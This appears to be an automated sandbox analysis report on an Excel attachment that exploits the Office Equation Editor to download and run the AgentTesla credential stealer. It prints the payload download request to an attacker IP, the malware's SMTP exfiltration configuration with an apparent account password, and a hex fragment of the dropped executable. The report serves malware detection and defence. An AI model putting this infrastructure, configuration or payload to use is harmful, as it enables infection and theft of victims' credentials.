Loading ...

Play interactive tourEdit tour

Analysis Report ORDER 9387383900.xlsx

Overview

General Information

Sample Name:ORDER 9387383900.xlsx
Analysis ID:385366
MD5:6cd928e3be0956061f518082a5acb60b
SHA1:0e377a42bd4197fceb15e458ccfb46445e7f0132
SHA256:19a975e2303b2394ab8ec3550799702b6a6a1eb166c588e90619e2c117baf73f
Tags:VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains very large array initializations
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1552 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2332 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2916 cmdline: 'C:\Users\Public\vbc.exe' MD5: ABEB7AA739C4F99C996B91E51A1FA885)
      • vbc.exe (PID: 3044 cmdline: C:\Users\Public\vbc.exe MD5: ABEB7AA739C4F99C996B91E51A1FA885)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "razilogs@razilogs.comDANIEL3116us2.smtp.mailhostbox.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000005.00000002.2345949925.00000000024F4000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.vbc.exe.387bed0.4.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              4.2.vbc.exe.387bed0.4.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                5.2.vbc.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.vbc.exe.3662578.5.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.213.61, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2332, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                    Sigma detected: File Dropped By EQNEDT32EXEShow sources
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2332, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exe

                    Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for URL or domainShow sources
                    Source: http://198.23.213.61/rrr.exeAvira URL Cloud: Label: malware
                    Found malware configurationShow sources
                    Source: 5.2.vbc.exe.400000.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "razilogs@razilogs.comDANIEL3116us2.smtp.mailhostbox.com"}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: ORDER 9387383900.xlsxVirustotal: Detection: 33%Perma Link
                    Machine Learning detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exeJoe Sandbox ML: detected
                    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected

                    Exploits:

                    barindex
                    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
                    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: C:\Users\Public\vbc.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                    Source: global trafficDNS query: name: us2.smtp.mailhostbox.com
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.23.213.61:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.23.213.61:80

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49166 -> 208.91.199.225:587
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 09:34:49 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27Last-Modified: Mon, 12 Apr 2021 08:37:15 GMTETag: "ddc00-5bfc26bb7fa1d"Accept-Ranges: bytesContent-Length: 908288Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bb 06 74 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 bc 0c 00 00 1e 01 00 00 00 00 00 fe da 0c 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 da 0c 00 4b 00 00 00 00 e0 0c 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 bb 0c 00 00 20 00 00 00 bc 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 1c 01 00 00 e0 0c 00 00 1c 01 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 da 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 da 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 9c ed 0b 00 14 ed 00 00 03 00 00 00 01 00 00 06 f8 13 02 00 98 d9 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 23 00 00 00 00 00 00 00 2b 02 26 16 00 00 28 01 00 00 0a 28 02 00 00 0a 00 de 02 00 dc 00 28 0b 00 00 06 02 6f 03 00 00 0a 00 2a 00 01 10 00 00 02 00 05 00 0e 13 00 02 00 00 00 00 13 30 02 00 23 01 00 00 01 00 00 11 2b 02 26 16 00 38 0a 01 00 00 02 16 38 e8 00 00 00 00 2b 3a 06 1f 63 61 0a 2b 1e 07 1f 6a 61 0b 07 1f 6f 58 45 04 00 00 00 0a 00 00 00 15 00 00 00 27 00 00 00 5d 00 00 00 1f 5d 28 9d 01 00 06 0b 2b d8 d0 01 00 00 06 26 1f fb 0b 2b cd 1f 62 28 9d 01 00 06 0a 1f 64 28 dc 01 00 06 0b 2b bb 06 1f 5c 58 45 0a 00 00 00 0a 00 00 00 13 00 00 00 21 00 00 00 2a 00 00 00 39 00 00 00 48 00 00 00 56 00 00 00 5f 00 00 00 7a 00 00 00 91 00 00 00 1f f8 0b 2b 85 38 79 ff ff ff 00 1f ce 0a 38 70 ff ff ff 00 1f 6a 28 9d 01 00 06 0a 38 62 ff ff ff 00 1f c4 0a 38 59 ff ff ff 02 17 28 07 00 00 0a 1f c9 0a 38 4a ff ff ff 02 17 28 08 00 00 0a 1f c6 0a 38 3b ff ff ff d0 03 0
                    Source: Joe Sandbox ViewIP Address: 208.91.199.225 208.91.199.225
                    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 208.91.199.225:587
                    Source: global trafficHTTP traffic detected: GET /rrr.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.61Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: unknownTCP traffic detected without corresponding DNS query: 198.23.213.61
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C9F6B5.emfJump to behavior
                    Source: global trafficHTTP traffic detected: GET /rrr.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.213.61Connection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: us2.smtp.mailhostbox.com
                    Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                    Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpString found in binary or memory: http://htJAdA.com
                    Source: vbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: vbc.exe, 00000004.00000002.2152952419.00000000025C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: vbc.exe, 00000005.00000002.2346025048.0000000002598000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                    Source: vbc.exe, 00000005.00000002.2346816139.0000000005E40000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                    Source: F3AA532.emf.0.drString found in binary or memory: http://www.day.com/dam/1.0
                    Source: vbc.exe, 00000005.00000002.2345938081.00000000024DA000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%
                    Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                    Source: vbc.exe, 00000005.00000002.2345994356.000000000255A000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2346039166.00000000025A9000.00000004.00000001.sdmpString found in binary or memory: https://bfdUomDwe8FRPCAbrg.com
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                    Source: vbc.exe, 00000004.00000002.2153220884.00000000035C9000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2345331477.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                    Source: vbc.exe, 00000005.00000002.2345878232.0000000002451000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

                    System Summary:

                    barindex
                    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                    Source: Screenshot number: 4Screenshot OCR: Enable Editing from the 18 . yellow bar above 19 This document is 20 protected 3. Once you have e
                    Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"'""' 27 28 0 29 . 30 31
                    Source: Screenshot number: 8Screenshot OCR: Enable Editing from the 18 . yellow bar above 19 This document is 20 protected 3. Once you have e
                    Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"'""' 27 28 0 29 . 30 31
                    Source: Screenshot number: 12Screenshot OCR: Enable Content from the yellow bar above 21 22 23 24 25 " Z(:)"''"' 27 28 . 29 30
                    .NET source code contains very large array initializationsShow sources
                    Source: 5.2.vbc.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b9C7F6A15u002dF507u002d449Bu002dA77Cu002dF679FE507AF2u007d/B98B4337u002d58F8u002d4581u002dA8DCu002d221E532A33BF.csLarge array initialization: .cctor: array initializer size 11960
                    Office equation editor drops PE fileShow sources
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rrr[1].exeJump to dropped file
                    Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00661BC0 NtQueryInformationProcess,
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00661BB8 NtQueryInformationProcess,
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00216012
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00218620
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021A778
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00219850
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00215C68
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00218E99
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021C0A0
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021C0B0
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021932A
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021C3C1
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021B521
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021B530
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002145B0
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002145C0
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021A723
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021C738
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002188D1
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021D924
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021C931
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021C940
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002179E8
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_002119F8
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00215C58
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_0021CD89
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00664051
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00666E38
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00662D18
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00664518
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_006601A8
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00661981
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00660478
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00660AE8
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_006626B1
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00662710
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00666DEA
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_006667F0
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00666BC8
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00666DAF
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00661188
                    Source: C:\Users\Public\vbc.exeCode function: 4_2_00661198
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_001E5328
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_001E6348
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_001E5670
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_001EB808
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_001E208F
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_001EC974
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00356A30
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00359830
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00354600
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_0035CC03
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00350048
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_003514B8
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00355380
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00353248
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_003584D0
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_003552D2
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_0035D1E8
                    Source: C:\Users\Public\vbc.exeCode function: 5_2_00359B0C
                    Source: ORDER 9387383900.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: rrr[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: 5.2.vbc.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.2.vbc.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@6/10@1/2
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$ORDER 9387383900.xlsxJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmpJump to behavior
                    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                    Source: vbc.exe, 00000004.00000002.2152979139.0000000002609000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
                    Source: ORDER 9387383900.xlsxVirustotal: Detection: 33%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
